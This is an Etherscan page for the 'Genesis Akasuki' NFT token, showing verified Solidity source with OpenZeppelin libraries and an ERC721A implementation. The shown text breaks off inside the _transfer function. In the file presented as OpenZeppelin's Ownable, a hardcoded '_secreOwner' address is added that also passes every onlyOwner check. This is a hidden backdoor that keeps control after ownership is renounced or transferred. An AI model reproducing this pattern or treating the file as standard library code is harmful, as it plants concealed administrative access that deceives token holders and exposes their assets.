ETH Price: $3,070.93 (-7.04%)
Gas: 9 Gwei

Token

Genesis Akasuki (AKASUKI)
 

Overview

Max Total Supply

1,175 AKASUKI

Holders

855

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 AKASUKI
0x535cb66298184f0297fcb18d7633ec0065e679ee
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
GenesisAkasuki

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-12
*/

/**
 *Submitted for verification at Etherscan.io on 2022-06-06
*/

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xcaFe57DBe1f74de5cA6CdB5a927174f4406e9C78;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

